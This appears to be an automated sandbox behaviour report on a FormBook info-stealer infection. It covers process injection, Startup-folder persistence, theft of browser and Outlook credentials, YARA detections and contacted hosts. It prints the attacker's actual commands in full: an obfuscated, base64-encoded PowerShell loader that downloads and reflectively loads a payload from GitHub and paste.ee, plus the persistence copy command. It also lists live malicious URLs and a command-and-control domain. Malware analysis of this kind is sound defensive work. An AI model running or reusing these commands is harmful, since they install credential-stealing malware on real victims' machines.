Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\appidtel.exe	Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: NULL target: C:\Windows\SysWOW64\appidtel.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\convert.exe

Thread register set: target process: 1756

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\convert.exe

Thread APC queued: target process: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\appidtel.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\appidtel.exe base: 303A008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icgokcdojysnumz1jysncmwgpsbom2todhrwczonkycvlycrj3jhjysndy4nkydnaxrodscrj2j1jysnc2vyjysny29udgvujysndc5jb20nkycvtm8nkydezxrly3rpjysnbi9ob0rldgvjde9ul3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtjysnvi50ehrom2s7ighsjysnzminkydhc2u2nccrj0nvbnrlbnqgpscrjyaotmunkyd3lu9iamvjdcbtexn0zscrj20uticrj2v0lldlyicrj0nsawvudckurg93bmxvywrtdhinkydpbmcnkycoafinkydmdxjsktsgafinkydmymluyxinkyd5qycrj29udgvudca9ifttjysnescrj3n0zw0uq29udmvyjysndf06jysnokzyb21cyscrj3mnkydlnjrtdhinkydpbmcoaccrj1jmyicrj2enkydzjysnzty0q28nkydudgvudccrjyknkyc7iggnkydszmenkydzcycrj2vtymx5id0gw1jlzmxljysny3rpb24nkycuqxnzzw1ibhknkyddojpmb2fkkghszmjpbmfyeunvbnrlbnqpoybbzccrj25sawinkycusu8usg9tzv06olzbssgnkydddxqwl08nkycxrkttl2qvzwuuzxrzyxankycvlzpzchr0accrj0n1dcwgq3unkyd0zccrj2vzyxrpdmfkb0n1dcwnkycgjysnq3unkyd0zgvzyxrpdmfkb0n1dcwgjysnq3v0zgunkydzyxrpdmfkb0n1dcwgq3v0zccrj2vzjysnyxqnkydpdmenkydkbycrj0n1dcwnkycgqycrj3v0mumnkyd1dcwgq3v0yxbwawr0zwxddxqpjykgic1jukvwbefjrsdddxqnlftjsefsxtm0icatukvwtefdzsagkftjsefsxtewnctby0hbul04mitby0hbul0xmdiplftjsefsxtm2icatukvwtefdzshby0hbul0xmdqrw2niqvjdnterw2niqvjdmta3ksxby0hbul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ((('h'+'rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/no'+'detecto'+'n/nodetecton/refs/heads/main/de'+'tahnoth-'+'v.txth3k; hr'+'fb'+'ase64'+'content ='+' (ne'+'w-object syste'+'m.n'+'et.web'+'client).downloadstr'+'ing'+'(hr'+'furl); hr'+'fbinar'+'yc'+'ontent = [s'+'y'+'stem.conver'+'t]:'+':fromba'+'s'+'e64str'+'ing(h'+'rfb'+'a'+'s'+'e64co'+'ntent'+')'+'; h'+'rfa'+'ss'+'embly = [refle'+'ction'+'.assembly'+']::load(hrfbinarycontent); [d'+'nlib'+'.io.home]::vai('+'cut0/o'+'1fks/d/ee.etsap'+'//:sptth'+'cut, cu'+'td'+'esativadocut,'+' '+'cu'+'tdesativadocut, '+'cutde'+'sativadocut, cutd'+'es'+'at'+'iva'+'do'+'cut,'+' c'+'ut1c'+'ut, cutappidtelcut)') -creplace'cut',[char]34 -replace ([char]104+[char]82+[char]102),[char]36 -replace([char]104+[char]51+[char]107),[char]39))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icgokcdojysnumz1jysncmwgpsbom2todhrwczonkycvlycrj3jhjysndy4nkydnaxrodscrj2j1jysnc2vyjysny29udgvujysndc5jb20nkycvtm8nkydezxrly3rpjysnbi9ob0rldgvjde9ul3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtjysnvi50ehrom2s7ighsjysnzminkydhc2u2nccrj0nvbnrlbnqgpscrjyaotmunkyd3lu9iamvjdcbtexn0zscrj20uticrj2v0lldlyicrj0nsawvudckurg93bmxvywrtdhinkydpbmcnkycoafinkydmdxjsktsgafinkydmymluyxinkyd5qycrj29udgvudca9ifttjysnescrj3n0zw0uq29udmvyjysndf06jysnokzyb21cyscrj3mnkydlnjrtdhinkydpbmcoaccrj1jmyicrj2enkydzjysnzty0q28nkydudgvudccrjyknkyc7iggnkydszmenkydzcycrj2vtymx5id0gw1jlzmxljysny3rpb24nkycuqxnzzw1ibhknkyddojpmb2fkkghszmjpbmfyeunvbnrlbnqpoybbzccrj25sawinkycusu8usg9tzv06olzbssgnkydddxqwl08nkycxrkttl2qvzwuuzxrzyxankycvlzpzchr0accrj0n1dcwgq3unkyd0zccrj2vzyxrpdmfkb0n1dcwnkycgjysnq3unkyd0zgvzyxrpdmfkb0n1dcwgjysnq3v0zgunkydzyxrpdmfkb0n1dcwgq3v0zccrj2vzjysnyxqnkydpdmenkydkbycrj0n1dcwnkycgqycrj3v0mumnkyd1dcwgq3v0yxbwawr0zwxddxqpjykgic1jukvwbefjrsdddxqnlftjsefsxtm0icatukvwtefdzsagkftjsefsxtewnctby0hbul04mitby0hbul0xmdiplftjsefsxtm2icatukvwtefdzshby0hbul0xmdqrw2niqvjdnterw2niqvjdmta3ksxby0hbul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ((('h'+'rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/no'+'detecto'+'n/nodetecton/refs/heads/main/de'+'tahnoth-'+'v.txth3k; hr'+'fb'+'ase64'+'content ='+' (ne'+'w-object syste'+'m.n'+'et.web'+'client).downloadstr'+'ing'+'(hr'+'furl); hr'+'fbinar'+'yc'+'ontent = [s'+'y'+'stem.conver'+'t]:'+':fromba'+'s'+'e64str'+'ing(h'+'rfb'+'a'+'s'+'e64co'+'ntent'+')'+'; h'+'rfa'+'ss'+'embly = [refle'+'ction'+'.assembly'+']::load(hrfbinarycontent); [d'+'nlib'+'.io.home]::vai('+'cut0/o'+'1fks/d/ee.etsap'+'//:sptth'+'cut, cu'+'td'+'esativadocut,'+' '+'cu'+'tdesativadocut, '+'cutde'+'sativadocut, cutd'+'es'+'at'+'iva'+'do'+'cut,'+' c'+'ut1c'+'ut, cutappidtelcut)') -creplace'cut',[char]34 -replace ([char]104+[char]82+[char]102),[char]36 -replace([char]104+[char]51+[char]107),[char]39))"	Jump to behavior

Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\convert.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	paste.ee	European Union	13335	CLOUDFLARENETUS	true
199.59.243.227	www.donante-de-ovulos.biz	United States	395082	BODIS-NJUS	true
185.199.111.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
paste.ee	188.114.96.3	true
raw.githubusercontent.com	185.199.111.133	true
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true
www.donante-de-ovulos.biz	199.59.243.227	true
ax-0001.ax-msedge.net	150.171.28.10	true

Contacted URLs

Name	Malicious	Reputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt	false	unknown
https://paste.ee/d/SKF1O/0	true	unknown
http://www.donante-de-ovulos.biz/6450/?EzrD=UbYh&mzEt0=52WN8KqJ7jnOEIaeyCxqWgP+KtwCoaIDn8AokGilDz2wl3Qo7VTMWMYazPgXvK5QOqLqt5Ti3xVPGgdXo5E4TqsbUcYSzSRqT9OtwmziQ+LYHZobMnJC5bEpbrqa7K8o2xX/TOE=	true	unknown

AV Detection

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
